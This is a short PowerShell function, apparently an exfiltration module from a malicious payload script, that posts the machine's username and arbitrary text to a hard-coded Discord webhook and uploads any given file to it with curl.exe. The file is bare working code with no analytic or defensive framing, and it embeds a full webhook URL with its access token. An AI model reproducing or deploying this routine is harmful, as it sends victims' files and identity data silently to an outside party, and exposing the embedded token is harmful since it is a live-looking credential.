function Upload-Discord {
  [CmdletBinding()]
  param (
      [parameter(Position=0,Mandatory=$False)]
      [string]$file,
      [parameter(Position=1,Mandatory=$False)]
      [string]$text
  )
 
  $hookurl = "https://discord.com/api/webhooks/1117010204882649108/P17xsDKiBxsPNV0G49brrLwtwkHU-haM3iOLQJmp8c9dMQKve_e4vWvR6F966DiiYGOB"
 
  $Body = @{
    'username' = $env:username
    'content' = $text
  }
 
  if (-not ([string]::IsNullOrEmpty($text))){
  Invoke-RestMethod -ContentType 'Application/Json' -UseBasicParsing -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)};
 
  if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
  }

